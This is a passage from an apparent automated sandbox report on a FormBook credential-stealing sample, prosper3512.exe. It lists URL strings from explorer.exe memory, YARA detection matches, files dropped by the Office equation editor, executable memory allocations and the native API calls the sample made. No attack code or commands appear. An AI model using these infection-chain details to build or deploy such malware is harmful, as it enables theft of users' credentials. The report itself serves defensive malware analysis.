          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1es
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419D50 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419E00 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419E80 NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419D4C NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419DFD NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419E7A NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_009300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00930078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_009310D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00930060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_009301D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0093010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00931148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_009307AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00931930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00930C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_00931D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_2_0092FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419D50 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419E00 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419E80 NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419D4C NtCreateFile,
